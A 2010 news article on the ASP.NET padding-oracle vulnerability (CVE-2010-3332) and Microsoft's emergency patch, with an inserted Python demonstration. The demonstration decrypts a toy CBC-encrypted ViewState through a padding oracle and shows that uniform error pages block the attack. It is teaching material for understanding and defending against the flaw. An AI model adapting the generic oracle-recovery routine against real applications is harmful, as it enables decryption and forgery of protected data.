Sep 28, 2010 09:35 GMT

Microsoft plans to release a patch today for a serious and actively exploited vulnerability affecting millions of ASP.NET applications.

The vulnerability, identified as CVE-2010-3332, enables a class of cryptographic attack known as a "padding oracle" attack and was publicly disclosed two weeks ago at the ekoparty security conference by researchers Juliano Rizzo and Thai Duong.

The flaw allows an attacker to tell apart the errors an ASP.NET application returns when it is sent specially crafted encrypted strings: a ciphertext whose decryption ends in malformed padding produces a different response from one whose padding is well formed but whose content fails later checks. By submitting many such modified ciphertexts and observing which error comes back, the attacker learns enough to decrypt, and ultimately forge, encrypted ViewState data without knowing the key.

The ViewState object can hold sensitive information such as passwords or other application data, and the same oracle can be leveraged to retrieve files from the web application, including web.config, which typically holds database connection strings and the application's machineKey. Either path can lead to complete application compromise.

Microsoft has already confirmed the presence of attacks exploiting this vulnerability in the wild and has published extensive mitigation instructions to counter them. The core workaround is to configure customErrors so that every error, whatever its cause, returns the same page, removing the difference in responses the attack depends on; for ASP.NET 3.5 SP1 and 4.0, Microsoft additionally recommends adding a random delay in that error page to mask timing differences.
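To make the mechanism described above concrete, the following is an added, self-contained Python example; it is not code from the article, from Microsoft or from the researchers. It models both what the paragraph on the flaw describes (a server that reveals whether decryption produced valid padding) and the paragraph on the mitigation (a server that returns one indistinguishable error), and runs the byte-by-byte CBC padding-oracle decryption against each. Everything in it is constructed: a toy four-round Feistel block cipher stands in for the real cipher (the attack depends only on CBC chaining and PKCS#7 padding, not on the cipher), and the key, IV, error strings and ViewState-like payload are invented for the demonstration.

```python
"""Padding-oracle decryption of a CBC-encrypted blob, modelled on the ASP.NET
ViewState case. Constructed for illustration only: toy block cipher, demo key,
demo payload. No cryptographic library is needed because the attack relies
solely on CBC chaining plus PKCS#7 padding."""
import hashlib
import hmac

BLOCK = 16
KEY = b"constructed-demo-machine-key-32b"   # constructed; a real machineKey is secret
IV = b"constructed-iv16"                    # constructed 16-byte IV
VIEWSTATE = b"__VIEWSTATE:user=admin;role=owner"  # constructed stand-in payload


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key: bytes, i: int, half: bytes) -> bytes:
    # Round function of the toy Feistel cipher: keyed hash truncated to 8 bytes.
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:8]


def block_encrypt(key: bytes, blk: bytes) -> bytes:
    l, r = blk[:8], blk[8:]
    for i in range(4):
        l, r = r, _xor(l, _round(key, i, r))
    return l + r


def block_decrypt(key: bytes, blk: bytes) -> bytes:
    l, r = blk[:8], blk[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _round(key, i, l)), l
    return l + r


def pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("Padding is invalid and cannot be removed.")
    return data[:-n]


def cbc_encrypt(key: bytes, iv: bytes, pt: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, _xor(pt[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(ct), BLOCK):
        blk = ct[i:i + BLOCK]
        out.append(_xor(block_decrypt(key, blk), prev))
        prev = blk
    return b"".join(out)


def protect(key: bytes, iv: bytes, message: bytes) -> bytes:
    """Server side: MAC the message, then encrypt. Blob is iv || CBC(pad(msg || mac))."""
    mac = hmac.new(key, message, hashlib.sha256).digest()
    return iv + cbc_encrypt(key, iv, pad(message + mac))


PADDING_ERROR = "500: Padding is invalid and cannot be removed."   # constructed message
MAC_ERROR = "500: Validation of viewstate MAC failed."             # constructed message
GENERIC_ERROR = "500: An error occurred."  # one page for every error, as in the workaround


def leaky_server(blob: bytes) -> str:
    """Distinguishes padding failures from later failures: this is the oracle."""
    iv, body = blob[:BLOCK], blob[BLOCK:]
    try:
        data = unpad(cbc_decrypt(KEY, iv, body))
    except ValueError:
        return PADDING_ERROR
    msg, mac = data[:-32], data[-32:]
    if not hmac.compare_digest(mac, hmac.new(KEY, msg, hashlib.sha256).digest()):
        return MAC_ERROR
    return "200 OK"


def hardened_server(blob: bytes) -> str:
    """Same decryption, but every failure collapses into one identical response."""
    return "200 OK" if leaky_server(blob) == "200 OK" else GENERIC_ERROR


def recover_block(oracle, prev: bytes, target: bytes) -> bytes:
    """Recover one CBC block's plaintext using only the preceding block (or IV)
    and oracle(blob) -> True when the server does NOT report a padding error."""
    inter = bytearray(BLOCK)  # block_decrypt(KEY, target), learned right to left
    for pos in range(BLOCK - 1, -1, -1):
        p = BLOCK - pos                 # padding value we force onto bytes pos..15
        crafted = bytearray(prev)       # unknown positions keep the real prev bytes
        for j in range(pos + 1, BLOCK):
            crafted[j] = inter[j] ^ p
        for g in range(256):
            crafted[pos] = g
            if not oracle(bytes(crafted) + target):
                continue
            if pos == BLOCK - 1:
                # 0x02 0x02 (or longer) could also be valid padding by chance; flip
                # the byte to the left and re-query, only a genuine 0x01 survives.
                crafted[pos - 1] ^= 0xFF
                still_ok = oracle(bytes(crafted) + target)
                crafted[pos - 1] ^= 0xFF
                if not still_ok:
                    continue
            inter[pos] = g ^ p
            break
        else:
            raise RuntimeError("oracle never accepted a guess at position %d" % pos)
    return _xor(bytes(inter), prev)


def recover_all(oracle, blob: bytes) -> bytes:
    blocks = [blob[i:i + BLOCK] for i in range(0, len(blob), BLOCK)]
    return b"".join(recover_block(oracle, blocks[i - 1], blocks[i])
                    for i in range(1, len(blocks)))


def demo():
    """Returns (true padded plaintext, result against leaky server, result against hardened server)."""
    blob = protect(KEY, IV, VIEWSTATE)
    truth = pad(VIEWSTATE + hmac.new(KEY, VIEWSTATE, hashlib.sha256).digest())
    leaky = recover_all(lambda b: leaky_server(b) != PADDING_ERROR, blob)
    hardened = recover_all(lambda b: hardened_server(b) != PADDING_ERROR, blob)
    return truth, leaky, hardened


if __name__ == "__main__":
    truth, leaky, hardened = demo()
    print("leaky server   :", leaky == truth, unpad(leaky)[:len(VIEWSTATE)])
    print("hardened server:", hardened == truth)
```

Against `leaky_server` the attacker recovers the full padded plaintext, including the MAC, without ever seeing the key; against `hardened_server` the same code runs to completion but returns garbage, because nothing in the response tells it which guesses produced valid padding. Note that the hardened model only closes the error-message channel; the timing channel Microsoft's workaround also addresses is not simulated here.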

The vulnerability affects all supported versions of the .NET Framework, and the patch expected to land today (security bulletin MS10-070) will be an out-of-band release.

The company normally delivers updates during the second Tuesday of every month, a day that has become known in the industry as Patch Tuesday.

"The security update is fully tested and ready for release, but will be made available initially only on the Microsoft Download Center.

This enables us to get the update out as quickly as possible, allowing administrators with enterprise installations, or end users who want to install this security update manually, the ability to test and update their systems immediately.

We strongly encourage these customers to visit the Download Center, download the update, test it in their environment and deploy it as soon as possible," Dave Forstrom, Microsoft's director of trustworthy computing, wrote on the Microsoft Security Response Center (MSRC) blog.

The patch will also be pushed through Windows Update and Windows Server Update Services (WSUS) during the upcoming days and will appear in Automatic Updates once it sees a broader deployment.